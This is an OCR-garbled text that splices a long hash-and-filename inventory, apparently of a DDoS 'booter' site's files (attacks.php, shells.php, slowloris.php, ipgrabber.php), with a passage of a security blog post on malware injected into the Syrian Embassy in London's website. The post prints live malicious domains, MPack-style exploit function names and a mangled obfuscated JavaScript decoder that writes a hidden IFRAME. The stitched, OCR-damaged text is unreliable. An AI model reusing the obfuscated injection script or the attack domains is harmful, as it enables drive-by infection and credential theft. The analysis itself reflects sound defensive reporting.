fdbbee227190f4001956e359b05c782a 
jquery.inputlimiter.min.js 
3e914c371c4ac65d3c1f06610bbf02d5 
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jquery.maskedinput.min.js 
100b0034ffbcb736b9e90019babb57ee 
jquery.tagsinput.min.js 
01ff74de53c8ef125d2318e891720869 
jquery.validationEngine-en.js 
4b4459c5a6c6c80e328ca0e38a37a166 
jquery.validationEngine.js 
6bO0bfd00e2aa14a618cfb62a4b2c4d31 
uniform.js 
a7a2ee281cflbda4545159c57c9a5808 
jquery.mousewheel.js 
214ee334bd63ceb72b99b11a64799843 
ui.spinner.js 
68dfe5be7a84c2167b3550833f0f638e 
datatable.js 
c1c02088fa9233fae2a69807b3295f07 
resizable.min.js 
9b16b5030a0669c101526ba1f28b2d4d 
tablesort.min.js 
9e6e97bd8fd28332b7ffc98e4a49719e 
jquery.breadcrumbs.js 
3584e0deabee5ad6d1aeda3d06d81874 
jquery.collapsible.min.js 
4a55b9e010f4d5276c15cda7370e7c5b 
jquery.colorpicker.js 
96e6db8dd2c341f8aee73603eccea3b9 
jquery.jgrowl.js 
5ele860fla90e6f183fbfb72ea7e7638 
jquery.prettyPhoto.js 
5e79ae6c86daab6dd93298f38e5037c24 
jquery.progress.js 
21d0f3233d2b1lac3fb2f91717d9a82b7 
jquery.sourcerer.js 
abfffbb85b36410a66a0c671f102F744 
jquery.timeentry.min.js 
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ac42e1f9eaef7c1b55bc57d2a07b4e51 
jquery.tipsy.js 
58773d323f2565e7414e38b4344d07c1 
jquery.plupload.queue.js 
0240ddc67de39660d17elce3fb872f87 
plupload.browserplus.js 
6f1c5a226a1ab5040b6899713afeb434 
plupload.flash.js 
698aa2cb6a220ca9c670291eb0c46d57 
plupload.flash.swf 
79f5ccf96689e466eaace3cd58b370c4 
plupload.full.js 
e37fb4b8c241fd5a7da5601fd27f5482 
plupload.gears.js 
29c5e459b63e9d87dele722d77e3d996 
plupload.html4.js 
734fe87262125790dd0e51428322bc73 
plupload.html5.js 
7f5fd356cc213b31bcd43bc487ff8bef 
plupload.js 
5a8a343b94ef9927e5791dac3c57b28d 
plupload.silverlight.js 
4152d57d9dcf7ea975bb05043e53a83e 
plupload.silverlight.xap 
f3c8aaf882dled25a7f5fe7fd2ee4d9d 
CS.jS 
d480e573f6c975e7cd7b183358ce8f37 
da.js 
45c7b4ffc7105f70d785a920c19elfc3 
de.js 
493717f439cfa3332a073ae221bfff94 
es.jS 
1f34297424bc8cc90e528be52350f680 
fi.js 
b5726dc6d6aee2ddbb010665b7db3182 
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fr.js 
8173c186ad88376667daca642252f316 
hr.js 
1493a7c7a33e789658d96f9c47aded33 
hu.js 
9db5590cdff0576al1e3cf048519293a6 
it.js 
8ff0c410587b271eb59e2f00f8b796d1 
jaJjs 
766065cd2f953cd803dce00931e7244f 
Iv.js 
76274c1f3856d532549e7e5ba22482c7 
nl.js 
6406412cf95bd69d5cb181342b9cb969 
pt-br.js 
65aaf036dbd829ae48d81627002fbf13 
ro.js 
ac86cd0f4c7b9679d8e091f82ef27b66 
ru.js 
b8dd7c748d3b406510efd4e4c6édf925f 
sr.jS 
eaa324c9234794a0b7940ddfe4e381e8 
SV.JS 
b0a14b220c229133b147f8fc61418bf5 
jquery.plupload.queue.js 
alf681fefa0ldeal02bd82ff227dddc2 
jquery.plupload.queue.css 
cf51139f75c54bd744e36f08d81a3cl1f 
backgrounds. gif 
cffe0a91c65558df4b5aa63991127af4 
buttons-disabled.png 
8c980565083d7e2715a99460bf2e3dd7 
buttons.png 
a346537fael024000ee667decb0a2c51 
delete.gif 
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c717185cfe962b3fdc5d41lelfeca4692 
done.gif 75efl3ad1fc6a379cb43826b81b2bb7c 
error.gif 
045182e6f7207b70c7a7541cab139e4a 
throbber.gif 
c366bfal8e6735f03be6347cebbadf37 
transp50.png 
6579bae8770cb3f5ea97be9d09869015 
jquery.ui.plupload.js 
02a89fb2b00b1068023372df98e60b5a 
jquery.ui.plupload.css 
d5c8fle53c3bdd1548c78fe2fl2adff3 
plupload-bw.png 
d957e4478b24ced04f13b0b660229d94 
plupload.png 
11345993ff9cc138743fd63a0574db8b 
jquery.form.js 
914a0balfc77f39ea06fc6c7dd716e93 
jquery.form.wizard.js 
9155calbf485754a79395dd2f29dddea 
jquery.validate.min.js 
c593e70ef041ab387fefad5fe38a724c 
.DS Store 
d7f66f4cfb6a8c6080e6cfc2a9139c76 
attacks.php 
c5balb5ad20cf3124136c485199b65c7 
converter.php 
b74ae16f256b8f45c9f052563ece74ad 
core.php 03b46c6ef6d60926e9290142c4679d9b 
db.php 
e706716efc7f41738970e80b0de39c24 
edit _profile.php 
cd9930e167803943c92cfdab42d741af 
enemies.php 
ef2¢c33e4a8424565696b3b6baff4158b 
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error_log 
cb6b1fcbe3ae7c0849747c81d27942d0 
friends.php 
3f9f4b913df612337f7e7642210e3eeb 
funny.php 
dc56c3698ec8fffd3337598aae5647f2 
hub.php 
37a174190f990e29fffa4938fbcbdca0 
index.php 
6cec5bda32771c4a8fb149998a744fbe 
ip logger.php 
f9Off34f4d27091e66173flee6a7d2c77 
logo.png d03d8db993590304028e2353c8d54037 
messages.php 
6c2db5737b3299a01669a30f27746c45 
profile.php 

e750e9347cbf3cef038a8ff0 7d026de4 
set state.php 
a19b7464ade08e8682a6b899811985e3 
terms.php 
7093c42d44e0a73bcalf2c85d5a43f6a 
tos.php 
8a0002c1bf8c3275718f21917d8bf379 
.DS Store 
472ccd9b56a4876c0d5e15389acbe579 
add.php 
1d2c3fd672e65cbf5a6flca881a3d893 
blacklist.php 
d486e5bc48ce21f33d38adabd2965b7a 
logs.php a4aaeadab65b64fofff8e263746d07475 
news.php 02799e169d64a00daee71026d5e8a710 
settings.php 
d8baebcd261d7b839dcal8b323e1b43d 
shells.php 
e49949e68dbc48dfdbb173641186717a 
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users.php 
b48491083b10ea167d38c29fb47b302b 
.DS Store 
42671d2acaf97bbcccb8e4ea4c9cb626 


blue.css 612f32570033ad3babc9a3ed7bae302c 


green.css 
80d07b9714cba042e3ae5f423e5bd6l1le 
index.php 

red.css 
509776432f2c260cd4330fe3ed1c2d22 
.DS Store 
9c2986c1d0e324d527aa790d2902a872 
index.php 

logo.png 
888555f84a3ce96albaaf70f496a40d7 
logol.png 
d03d8db993590304028e2353c8d54037 
Thumbs.db 
4d5251bc5cf5b3b1f43f1627f045ff99 
top.jpg 
4a09cb9a95d530ee288ce26537975a9c 
.DS Store 
bcd6e380c8f232321488966ec70c3298 
header.php 
8ff489db6f96011e46d7d3ee7fbc58a9 
index.php 

nav.php 
7127dfa3c684ff41a54e6a0904b834eb 
.DS Store 
a9338295b90517624b28925be0666c75 
index.php 

nav.php 
b8e7c564e660e36444c9c1f5742fa3c5 
activate.php 
29e8a708c05a3b3a94162bbde986f15c 
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addshell.php 
39b40ee13b66de122f3137ca0e8e7da2 
addshell unfinished.php 
2ce475c931cf3a4b54fd7d1f4cab5cbd 
admin.php 
db52903e0dfad292afb0a5645b679277 
checkuser.php 
2bfcdf002b83830fa65ee308d51a2695 
dbc.php 
7f6a61e071eee7f2c3d0b49454c00979 
do.php 
1b2000290158151cda00caac858e4a6b 
EpiCurl.php 
87519746acfd86a4eee60b297cf29929 
ezSQL.php 
f892f7586547fb8f174e4cfa1l835af97 
ezSQLCore.php 
b20797087c5159c1d37fc51446033ce9 
footer.php 
df40135b5872f7712903f9ae5d0d24a8 
hub.php 
6627c401b2bc2194d013647309230a9b 
index.php 
6e6cfde661a2367ac60281b1a57da8d5 
login.php 
5910aabf02f0e9acddeb31356d467215 
logout.php 
f7f43702441b28154fb45b1le2cddf99c 
logs.php 8d594c84e6f8e5028f4fdd921e3f1lf6b 
manageshells.php 
69b0aaf9eaf5ae6ca01188c2621e783e 
myaccount.php 
63ffeel9acObbaa36ddb11lfeeb6da37c 
mysettings.php 
7f8delcedb8e6d55c6ca0308f75aa874 
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register.php 
768b08e2fee7803dfbb157c7c44a433e 
shells. php 
535720c0cd383622df8ba2b0dd293bb0 
thankyou.php 
c1e8475931adf732999718afaedfa3b9 
updates.php 
b606dd2e00b658e488e78e926d241857 
attack.png 
5965277bf3794e776d63720dfd6efb34 
background.jpg 
20ae8d57237de989c2e4102122c2253a 
bg.gif 
4986640d1caf7e8b8574c541711a9aea 
logo.png 28b4beb3aa02e7af074946ef8f19fec3 
navigation.gif 
fd2b948223c1bc2e3b1885eb5d49b0a4 
styles.css 
99dfc635c2b2c38d8aa04704b89377bd 
count.js e3ad6cf2801lafc8bb78ba0d0ca721c37 
jquery-1.3.2.min.js 
bb381e2d19d8eace86b34d20759491a5 
jquery.validate.js 
d4afd58bbf0c43f0998264f92ae1d212 
Team313 _booter.sq| 
f60cbc88329c78bfl6ab316b6aef468b 
«htaccess 

accept.php 
1d9b47e6fefe5eaf24bb078d6cefc3cd 
activate.php 
29e8a708c05a3b3a94162bbde986f15c 
addshell.php 
b8673c63626a6a2b2f4c44f8fbb8b388 
admin.php 
b8c239f08fed087d39ea3e224d003083 
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checkuser.php 
2bfcdf002b83830fa65ee308d51a2695 
dbc.php 
4c29e5a3d10cbc494fb89f9c1bdc3009 
do.php 
1b2000290158151cda00caac858e4a6b 
donate.php 
23f33d9ecb6c75d3e845a3ec72c25d92 
enemies.php 
cb771ec70429380ce697d8e32b28702b 
footer1.php 
72000a73192f1lbe96b92bf80e7 af65f2 
friends.php 
189c62436e22982e16144falb2100973 
get.php 
130f364fb9fe0ba53557c21738aff389 
header.php 
1305eccf62fb1f8348c442e0ffafc790 
hub.php 
26334474b33f49e1c197ae8eef8b423e 
index.php 
ec8e8a0e6db6a3191ff9d5ac74eb38c0 
ipgrabber.php 
43d20534ea9c82be797bc3577d4d8c07 
ips2.php d18d0cec2d3c9a00fleb031d085fc4c3 
log.txt 
dc181bda19732da80b5fd270494d139a 
login.php 
65c9531e80748f395238cbb4f0b4913f 
logout.php 
£7f43702441b28154fb45ble2cddf99c 
logs.php 28d5fa4883c138ac4547d6994a7d5901 
manageshells.php 
b164140f7d44dba312efe199a4ad253d 
mysettings.php 
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After [1]Bank of India was serving malware in August, next to the [2]U.S Consulate in 
St.Petersburg two days later in September, now the [3]Syrian Embassy in London is the latest 
victim of [4]a popular malware embedding attack which took place between the 21st and 24th 
of September. As obfuscating the IFRAMEs in order to make it harder for a security researcher 
to conduct CYBERINT is about to become a commodity with the feature implemented within 
the now [5]commoditized malware kits, it’s interesting to note that in this particular attack 
the attackers took advantage of different javascript obfuscations, and that once control of the 
domain was obtained, scam pages were uploaded on the embassy’s server. The embassy had 
recently removed the malicious IFRAMEs, but the third one remains active acting as a counter 
for the malicious campaign. 


Which domains act as infection vectors? 


sicil.info/forum/index.php and sicil.info/g/index.php (203.121.79.71) using patched vulnerabil- 
ities exploited in the usual MPack style : 


function setslice _exploit 
function vml _exploit 
function firefox exploit 
function firefox1 _exploit 
function wmplayer _exploit 


function qtime _exploit 
function yahoo e 


function winzip _exploit 
function flash _exploit 
function w2k _ex 


Oki.ru/forum/index.php (80.91.191.224) where a WebAttacker launches several other exploits, 
and x12345.org/img/counter.php?out=1189360677 (66.36.243.97) 


<SCRIPT LANGUAGE="JavaScript™> 

<t-- 

function Decode(){var temp="",i,c=8,out="";var 

str="6691059162911499791099186193291199105 $10691169104961949932910491019105910391 Bet 116t61thors2¢9 
BIT TOOt 1G t 11th TMS S2t1G2t 11st 97¢ THOT THT9St itt 11st THGt 1H iis h61t ast s2t1istiir99t6it3s 
SPTGNt 11691169 112°S8t47t47848t 10791058469 114911794791629119919491179 1099479105911 08188 1018120846 
£11291642112939962966247!21059162911499791099101962!" ;l=str length ;while(c<=str.Llength-1){while(st 
r.charAt(c)t#"?t* )tenpetenpestr .charfAt(c++) ;c+**;out#out+String.fromCharCode( temp) ;tenpe""'; }documen 
t.write(out);} 

t/--> 

</SCRIPT><SCRIPT LANGUAGE="JavaScript''> 

<t-- 

Decode(); 

t{--> 

</SCRIPT>] 


What are the malware authors trying to infect the visitors with? 
A Banker Trojan with a low detection rate : 

BitDefender 2007.09.28 BehavesLike:Win32.ProcessHijack 
Ikarus 2007.09.28 Trojan.Delf.NEB 

1080 


0161f4e592197a0e05b529e5d73c042b 


pinger.php 
£9a61017254cb65c3e7a191fboc06ea48 


post.php 4c9bd2f1214eda3994d42101fede5944 


register.php 
1dbc8648ea79690ab607334106aafa22 
shellcounter.php 
807b62d5348f8c79c326058e278c75d0 
shells. php 
f80c9db6af46a790325a9430fd0351d0 
slowloris.php 
f9f995315941f1025512bf8450a7d147 
staff.php 
a6bc06cb94741b32fdde95c97bdc6730 
style.css 
803a979dd494cec76e3571496f71275e 
stylel.css 
ca497edcba35b7e487d463df6f9a0bc4 
style2.css 
a68ff93c6b5f87d9a0f7864bcb6cfal2d 
style3.css 
9733bef693ffd413d14749fed5d6aa2e 
support.php 
dff4b95b2c3c1d42e674ed9fa6c0d576 
thankyou.php 
347eda02579d6ae7a6623d98bal9e9c6 
tos.php 
89396765afb8bcle7dd47f6552a069a9 
updates.php 
70951b7734410648697ebce3aal942cc 
vpn.php 
6b9ef7e9c96F23f94087427e6a98946F 
«htaccess 
ccff4f837bada2e59d67c980782986b2 
about bg.jpg 
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f0d651e3991c0b68446242dad29ee619 
about icon.jpg 
62e7ce78da8a48aa6087f57100c0c59f 
about _iconl.jpg 
521b0060873a9ac887ecb9611e85a041 
about _icon2.jpg 
9e2e4504a748f35a77d8ca3ef00d0cde 
about _img.jpg 
cd9650658d16dff800866718774f55e5 
account.png 
f06ed29a1f595ca0f6c55050d9286c76 
add.png 
10a937c911080e41b7cb9a9de9ba44ac 
admin.png 
f90a24ef0c062f7d99195303d3eac446 
attack.png 
5965277bf3794e776d63720dfd6efb34 
background _bg.jpg 
40b20922be99d2ac534507e7b57787c1 
banner.jpg 

59a876fdbf65f5167 7cOfe4122a23468 
banner2.jpg 

59a876fdbf65f5167 7cOfe4122a23468 
banner3.jpg 

59a876fdbf65f5167 7c0fe4122a23468 
banner4.jpg 

59a876fdbf65f5167 7c0fe4122a23468 
bannernewl1.jpg 
acd14e7832a9b9944e28126b85571ea0 
bannernew2.jpg 
17ff2119cfde7948ef52887b421620ab 
bannernew3.jpg 
905989ee1ae57de408d02520cb3491a7 
banner _background.jpg 
49e470de25eefd4cf65e335c9leac4e8 
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bg.gif 
fo2ce9ab9c5bO0f6df442fa7d77b77978 
blog _bg.jpg 
41895eb74885ecab938f9fec6be1417f 
blog bottom.jpg 
a03d8dbb4849f83a3e06a99fe9784b24 
blog top.jpg 
26245499b432f53c52c3c24e76b0fe9a 
body _bg.jpg 
82acc71340d17ca597229670c8ccd6b8 
body bgl.jpg 
65877ee38laaa9e8a2b881ffe2253fee 
box.gif 
5b37c7dde228dac26cdce2ce9eccedad 
cancel.png 
6bf9ba341234639d4550602fd35e0988 
company _iconl.png 
bd7dd06171d308ac96299adca8b7881b 
company _icon2.png 
38bc733cc36375431cfobc6afl8a760f 
company _icon3.png 
60a287299c7d06254b312d0fb0f87e15 
company _icon4.png 
597d29b7e96c7a81ba01239b7e8d501a 
contact iocn.jpg 
f88e8a22cb17c81a4fe4e47b312e9d25 
delete.png 
6bf9ba341234639d4550602fd35e0988 
faviconl.png 
db624fe54779b11cb6b88a29989f0fc9 
footer bg.jpg 
b0eaeed24bdd99b1b921f8591928e879 
footer _iconl.jpg 
f8fbf36a6d5883579158ebc464bd17c5 


footer icon2.jpg 
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f360db07aada22fdab52b1561ef314d7 

footer _icon3.jpg 
12b148dfa0d2a467cda683913d38999b 

footer _icon4.jpg 
98f56f71fd339501793bf603c60237a6 

footer _line.jpg 
bd17178173e8783040fe5943210218fa 

get _bg.jpg 
34250f8da8c8e28ace285cfe009e7 793 

get icon.png 
77cb1e4853f5adf97ec5256933fd6092 

heading _bg.jpg 
79e439b43e3alcf9e9a83a9cbd1159b2 
heading _bor.jpg 
b1866037554635146e136d4afe89cef8 
home.gif d2c93d8510e7fc07 7f9ef7 765ff20a89 
hub.png 
fdeaf68ba6e3b0ba507a55ee85143307 

info.gif 8f3e812905f59a0e70755650a8a9b271 
info.png Obad85f30b97b1d1011c8161c66443f4 
input _bg.jpg 
12f246571e239a599c7a9d7f38c2291b 

key icon.png 
1cf5178b065b7f99f6209f5893393b9b 

logo.jog 86062ac3a61d0711bd4b389e43ac6450 
more _button.png 
3e78a9c886cb74b24d7d6d968e092f62 

more _buttonl.png 
affb2dd02d0323fccf46c7ac14c78d5c 

more _button2.png 
8d430bfd6c6ca3eab6eee91cde2ba89f9 

more _button3.jpg 
5eb77ba03d9c17842db76aldbedac394 

more _button3.png 
623af554f967e263f0e25ac68b9e8e00 
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more button _hover.png 
20c852ebdbd0da32c21894065252481b 
navigation.gif 
fd2b948223c1bc2e3b1885eb5d49b0a4 
news.gif 8b0a1312d184260ea42506f66298da5d 
our h2_bg.jpg 
09d6fb242052553e7df6d01a13d3786b 
our inner blog _bg.jpg 
4bcdee2fb7fe5c30ae03958ae814c91f 
our inner blog _bottom.jpg 
b32b18af5ccad292c3207bf4c1f89175 
our inner blog _bottom.png 
5931a49b817c65ec33f8835a5c20817b 
our inner blog _top.jpg 
9b88a945b71b4807c3fb2d9falcc3fb7 
our inner blog _top.png 
93948c79ea81ba29c9fb7 707 2b6f3af2 
portfolio icon.jpg 
df707b155a9feb0balc169276ec26582 
portfolio _img1l.jpg 
4470ee261159d02c7a581627ee73a45a 
portfolio _img2.jpg 

8e02efb82446420a7 leeb4e0b89b9f6F 
portfolio img3.jpg 
ba6bd8ab2d59b8d5d0c9d1028ad7b345 
p _border.jpg 
4d83ec25b6f5485c8c833b77ec37ac82 
question mark _icon.png 
7f716c0178b9dbea58e5415f1f4d700e 
send.jpg 5db26c3ae7clb5a6ce713bedc2153eb0 
service _iconl.jpg 
73a2106867256bae149d8e33718a817e 
service _imgl.jpg 
2b19d2a163c84fc5db03d869f4f50ba7 


service _img2.jpg 
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lcdfae3f87de9c2c4951fc2e476f55d2 
service _img3.jpg 
6e4ccd8c3b394cb561f44e18379fe893 
Slider bg.jpg 
a503593bed55b1ce582b59b1a67fc8b4 
standard bg.jpg 
13460321633ddaa5371a30cc4f81ac87 
standard bottom.jpg 
6ed49c8751b96b27330e5f8b595458f3 
standard top.jpg 
b9150f8d76a5a73940f025412b7fb990 
star _icon.png 
45d9358c65755f3ab34elaffOf4fo4fs 
styles.css 
596725dff5fe2e5416f4907ccc56c054 
ta-mark.png 
€38a91470f3c4de3017732702f065aff 
textarea _bg.jpg 
ea0a0c0551ef8e1d8865953d240764cc 
visit.png 
8a84a5d52aaa4b242af481969b9c774a 
VPN-OSX-setup01.jpg 
cla6beb6fa8d02b753dfff5020d7d4e538 
VPN-OSX-setup02.jpg 
6056b0d0b98b33e166916adc9a539d28 
VPN-OSX-setup03.jpg 
7ae7f3eebef731a34f3f17df4e5495bc 
VPN-OSX-setup04.jpg 
e02d7073f01dc5baa8df00f297ee0cb1 
VPN-OSX-setup05.jpg 
bee8b7088c41f4d531635ca9102118f6 
VPN-OSX-setup06.jpg 
cdb74440f208cf7a0db46bd08def7264 
VPN-OSX-setup07.jpg 
d67e82125ab8a2cfe86971fbf5c4397b 
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VPN-OSX-setup08.jpg 
885ee733743591537f142bd19e98a35c 
VPN-OSX-setup09.jpg 
65f3957c22f3176d4fe322e52ffb4546 
VPN-OSX-setup10.jpg 
225e22a18984b71748dc7c122ea4b437 
VPN-OSX-setup11.jpg 
a24d90c459646bf95bf8ceb663ba33a9 
VPN-OSX-setup12.jpg 
197bf766042339f9af1f28d6e9303147 
VPN-OSX-setup13.jpg 
89e2a023297ff7ee42bd1a5dbb9a6167 
win7-setup01.jpg 
5f1f3aa88e70cb45508980aac1f7838d 
win7-setup010.jpg 
0f04c38070a873bb64dabbab0fc42535 
win7-setup011.jpg 
810a33b0e9709e693675b8c650b3b52F 
win7-setup02.jpg 
4187e42055cb1707c53303c1be7b5172 
win7-setup03.jpg 
719f781761dec118df69734686af0b22 
win7-setup04.jpg 
062f2c70da7138d0ad1966c968130a4c 
win7-setup05.jpg 
ad9fd28b5a66e9a14486643148d2ed5b 
win7-setup06.jpg 
cf511293f7ceef5df3e2aele5a73937e 
win7-setup07.jpg 
657fb307a40d55cffcO2dcc4d2a68cc3 
win7-setup08.jpg 
75dfd6732a446b8425cae456bfff35c6 
win7-setup09.jpg 
72257cd8ff7847694ffd10f007df0289 
1.jpg 
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19c441e85da87f50ed0e7c361e1c75d0 
2.JPg 
4d62400c505aa5cab687be5195b28b39 
3.jpg 
83eldfal6fa3bd9a797572f6fald7c35 
4.jpg 
€38439bd6491f740912fe5f9b3fccf58 
5.JPg 
a090104f27f475e6925dd468f5 1cdc6f 
6.jpg 
82f89de0659be88elda2302e82dc6fac 
7.jpg 
572c¢140f425111d2b4299a3a533980e1 
8.jpg 
bf34e71ff8effb62a5105fb22767a3b3 
9.jpg 
60ded9b15e56b5594cc80363bf16F25c 
EpiCurl.php 
87519746acfd86a4eee60b297cf29929 
ezSQL.php 
542ae04084746ebe5c1436aad5620854 
ezSQLCore.php 
7fed28721c8597a095f23832f98d53c5 
functions.php 
21bd3f76edc7b550d21c2f580454fa78 
count.js fal7e54d6f5acda595b954d16fa8ae34 
ie6.js 
41ecb197c941b8ce2647d932109bf861 
jquery-1.3.1.min.js 
5018fce9eaf1l431e83fca0de4a735ef4 
jquery-1.3.2.min.js 
7091ff87b2c0439ac76c5afObccb877b 
jquery-1.4.4.min.js 
b76fc63a9c3fc4293fb90990818dd100 
jquery.validate.js 
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380280a6dbal4ec4cdab6ad0932d8d7e 
pnogfix.js 

9e47d6652eb0e7 3c2efd94a7489f6F32 
selectAllCheckBoxes.js 
cf29c8b3d2a431732a8f838c5609d26d 
ie6.css 

style.css 
e3e12fcfb84128114a05fef0bc4471 ff 
Capture.PNG 
5fa60d87241e433b4081ecabe234f111 
login.PNG 
2e58e692dc97b51d6a31af3a76f8068d 
activate.php 
29e8a708c05a3b3a94162bbde986f15c 
addshell.php 
ad549b6977050acf5379264a64c7cde5 
admin.php 
5010b63c40f426acceal17735b94692fc 
autoboot.php 
fa1193c9696426eece710842b88a29d6 
check.php 
d534b8a69df0a9ae5f4a2e22b1db385c 
checkuser.php 
2bfcdf002b83830fa65ee308d51a2695 
dbc.php 
5ca95bfb51ad4d0d8aad474e8a57152f 
do.php 
6fled2d14b188edal142a604e9f37215d 
error_log 
2655256fef71a10271504c4555b1891f 
footer.php 
3f8b317cefea25506e14ddaalaa7cb4b 
get.php 
949delde7abb7f71b5c54b80b7635cc9 
header.php 
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ac9bd938fee4691ba783d8386669523b 
hub.php 
35flae7aa8eab7f7db4516aa5050dc70 
index.php 
7733c1d5f5e64aff360cada59a025b11 
login.php 
9d7b7dfacff30924c648c68bf477e9cc 
logout.php 
37c363afcflc4772a3fd5e107cab60b5 
logs.php 2e€69967fb03486225b2c5f4b674989dc 
manageshells.php 
53ccdbda7820fa8d1d5c7606b7414503 
mysettings.php 
289385e48c5fba47ee861b52fd1738be 
navigation.php 
2cdc40b79c686641bb0b2264d91af033 
post.php 75a0171f32987ebd5bc4b1dc813833a4 
register.php 
d0c7fee5391aa99a83346d61fe742195 
shellcounter.php 
67c0196a948edfal6a25363889833012 
shells.php 
968210ffc0210a2d2507e587afcc3031 
slowloris.php 
d4fc8514a9d44d5913bfbf8fab4f454d 
staff.php 
52472d8149bc5e6019e74c150569f80b 
thankyou.php 
c1e8475931adf732999718afaedfa3b9 
updates.php 
f30db917bc87641fea9900bda4ccb4a8 
style.css 
b7bd4aaeed3d8f307946d180bb5148c3 
account.png 
f06ed29a1f595ca0f6c55050d9286c76 
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Microsoft 2007.09.28 PWS:Win32/Ldpinch.gen 
Symantec 2007.09.28 Infostealer.Banker.C 

98shd3.exe 

File size: 65024 bytes 

MD5: ef98a662c72e3227d5c4bb3465133040 

SHA1: e5b9b216d77de977848f8791850c726b45fc18c2 


Think malware authors were virtually satisfied to only have the visitors infected with the mal- 
ware? Not at all. This is perhaps the first but definitely not the last time | see an embassy 
hosting pharmaceutical scam pages and ring tone ones. List of historically hosted scam pages 


syrianembassy.co.uk/news/Iv/levitra-vs-viagra.htm 
syrianembassy.co.uk/news/Iv/buy-levitra.htm 
syrianembassy.co.uk/news/rn/michael-jackson-ringtone.htm 


syrianembassy.co.uk/news/xa/cheap-discount.htm-group.com-herbal-xanax-xnx.htm 
syrianembassy.co.uk/news/rn/free-mp3-ringtone-maker.htm 


syrianembassy.co.uk/news/xa/buy-site-xanax.htm 


syrianembassy.co.uk/news/ph/37-5mg-phentermine.htm 


UPDATE : 


The folks at ScanSafe contacted me to point out that [6]they’ve discovered the malware at 
the Syrian embassy on the 12th of August providing us with more insights on how long the 
attackers had access to the embassy’s site. In ScanSafe’s example, different malicious URLs 
(miron555.org/s/index.php) were rotated compared to the ones used during 21/24 of Septem- 
ber. And given the embassy’s site states it was last updated in 2005, cleaning it up and ensur- 
ing the attackers no longer have access to it may take a while. 


1, 

2. 
3 

4 
5. 
6. 


ttp://www.scansafe.com/threat_center/threat_alerts/malware_detected_on_website_of_the_syrian_embassy_in_ 
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add.png 
10a937c911080e41b7cb9a9de9ba44ac 
admin.png 
f90a24ef0c062f7d99195303d3eac446 
attack.png 
5965277bf3794e776d63720dfd6efb34 
background.jpg 
7aa4d2b3c58372160d5fad75a52c5567 
background1.jpg 
20ae8d57237de989c2e4102122c2253a 
bg.gif 
4986640d1caf7e8b8574c541711a9aea 
box.gif 
ab9c7ae3f11411185bb573f75e8elc2d 
boxl.gif 5b37c7dde228dac26cdce2ce9eccedad 
cancel.png 
6bf9ba341234639d4550602fd35e0988 
delete.png 
6bf9ba341234639d4550602fd35e0988 
home.gif d2c93d8510e7fc077f9ef7 765ff20a89 
hub.png 
fdeaf68ba6e3b0ba507a55ee85143307 
info.gif 8f3e812905f59a0e70755650a8a9b271 
info.png Obad85f30b97b1d1011c8161c66443f4 
login.css 
e2839c5f7867ae85d1e45f194ae7a41la 
logol.png 
4a4ef4dd665adf24e530cbbaa094794f 
logo2.png 
cd9dfc0c19611f418cb4312719a3c556 
navigation.gif 
ab9c7ae3f11411185bb573f75e8elc2d 
navigation1.gif 
fd2b948223c1bc2e3b1885eb5d49b0a4 
news.gif 8b0a1312d184260ea42506f66298da5d 
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slider.js 
42def1l72ef7d80f65e3c092al1ef0d81 
Slider handle.gif 
fee1994bccda07ac749b7636dfe047e0 
styles(old).css 
661317acdd1c4383556f5al0ffcf5479 
styles.css 
bf5ad0f8f749375328c3ef6249707c99 
visit.png 
8a84a5d52aaa4b242af481969b9c774a 
EpiCurl.php 
87519746acfd86a4eee60b297cf29929 
ezSQL.php 
f892f7586547fb8f174e4cfa1l835af97 
ezSQLCore.php 
b20797087c5159c1d37fc51446033ce9 
functions.php 
e93fe5f5b3efe9ac9bdad2d6b67f56d1 
count.js e3ad6cf280lafc8bb78ba0d0ca721c37 
jquery-1.3.2.min.js 
bb381e2d19d8eace86b34d20759491a5 
jquery-1.4.4.min.js 
73a9c334c5ca71d70d092b42064f6476 
jquery.validate.js 
d4afd58bbf0c43f0998264f92ae1d212 
free source.sq| 
1ldb77fd21fad8dfe60165b2122aedfde 
Install.txt 
db40780ba3f60a339eb67f66796b6e39 
boot.php 5e36824f1052f165637ef273a8a5efe0 
config.php 
7204cbe253db1b7f2df89913cb0lae2e 
funny.php 
a77b3836e4672a3045b1a6400a6b47e4 
index.php 
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d937f65bda69b982195c5f80ecO0f0b36 
logger.php 
e7d1e3f65b6b7e999554b1a461925b49 
login.php 
b4846811770533da8ab3bc20c8128b17 
settings.php 
c264ed6f75e577b5b5d2930cc7b60fe4 
unset.php 
7¢€82765a9a973f2e102105c4ecelda95 
api.php 
d4a3e952ca48506b08a32b037bca03al 
edit.php 73cf4c49380968c1d87331caec5784bb 
index.php 
e50bba0067850c8cd1f3315f795e68b6 
logs.php f37df969d022909fb1da52fbda2ed0ac 
users.php 

Ode8eb6a5e2bf0f5 7aaa9b9edd3e3f334 
bootstrap-overrides.css 
09cb8448435842cbe5e5d6b7c4cf8d51 
bootstrap-responsive.css 
702e€8485242b3ae5b4ce75a5edel3acb 
bootstrap.css 
6fa2911ee460068a855177a8dda42a6e 
font-awesome.css 
4322506f6cfdb2dc7b9a878ad875114c 
slate-responsive.css 
c507eb0f6e7896cdd74ae9d31d256c94 
slate.css 
54ff9bf79e161e5e9e30f2414a17al3d 
error.css 
e7423ccabec3b96dbd4fca9183098956 
gallery.css 
891432968a9c69156f3d6a10874b90F4 
pricing.css 
b873264294f9ba71fc5bb2443ae35fb6 
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signin.css 
07aa68f03d931d1738c3927d9c9135a8 
calendar.css 
741e55cb7ded0d20a37bbf6e7b546b92 
dashboard.css 
Ob2af90f1c6129aab6f9ceb54668f2152 

faq.css 
d59e448c7ab0c10fb3cc40e1caaa2016 
invoice.css 
c4e34627ade938366e0bb35d6448514b 
pricing.css 
8b56e77a59bd028bb71691a42fdf7e8a 
reports.css 
80dd18be36bbb2d7b1f4f940cfac4955 
ui-elements.css 
30d245e06f09ccbla2dlaf385ce9aaf0 
jquery-ui-1.8.21.custom.css 
*72198c22d1c81f07964aa397bb56d2e 

ui-bg _diagonals-thick 18 b81900 40x40.png 
95f9cceeb9d742dd3e917ec16ed754f8 

ui-bg diagonals-thick 20 666666 40x40.png 
f040b255ca1l3e693da34ab33c7d6b554 

ui-bg flat _10 000000 40x100.png 
c18cd01623c7fed23c80d53e2f5e7c78 

ui-obg glass 100 f6f6f6 1x400.png 
5f1847175ba18c41322cb9cb0581e0fb 

ui-bg glass 100 fdf5ce _1x400.png 
d26e8f463195a7b86f86b7d550cfc114 

ui-bg_ glass 65 _ffffff 1x400.png 
e5a8f32e28fd5c27bf0fed33c8a8b9b5 

ui-bg gloss-wave 35 f6a828 500x100.png 
